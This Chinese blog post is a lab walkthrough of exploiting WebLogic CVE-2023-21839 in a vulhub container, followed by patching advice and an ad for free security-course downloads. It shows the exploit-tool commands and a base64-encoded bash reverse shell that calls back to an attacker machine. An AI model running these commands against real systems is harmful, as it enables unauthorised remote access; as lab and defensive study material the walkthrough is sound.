Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)

前言: Weblogic 允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup 操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞。

0x00 环境设置

此次实验,我们使用P神的vulhub。启动环境:

cd /vulhub-master/weblogic/CVE-2023-21839
docker compose up -d

启动完成后访问http://your-ip:7001/console,可以看到管理界面。

0x01 验证漏洞

利用编译好的工具让目标靶机对dnslog平台发送请求:

CVE-2023-21839.exe -ip 192.168.2.103 -port 7001 -ldap ldap://g2zfh4.dnslog.cn/test

查看dnslog平台:

可以看到,平台成功接收到了我们利用工具对其发送的请求。

0x02 准备工作

此时打开一台kali用来生成shellpayload等待靶机远程加载:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTAwLzIzNDUgIDA+JjE=}

利用kali开启监听2345端口:

0x03 触发漏洞

windows上利用工具让靶机远程加载我们提前生成好的shellpayload:

CVE-2023-21839.exe -ip 192.168.2.103 -port 7001 -ldap ldap://192.168.2.100:1389/jxnf2s

可以看到此时kali这边接受到了远程请求:

0x04 获取SHELL

可以看到此时kali已经获取到了shell。

0x05 加固建议

  1. 使用连接筛选器临时阻止外部访问7001端口的T3/T3s协议
  2. 禁用IIOP协议。
  3. 升级weblogic版本,更新最新补丁。

最后

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

扫码领取

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值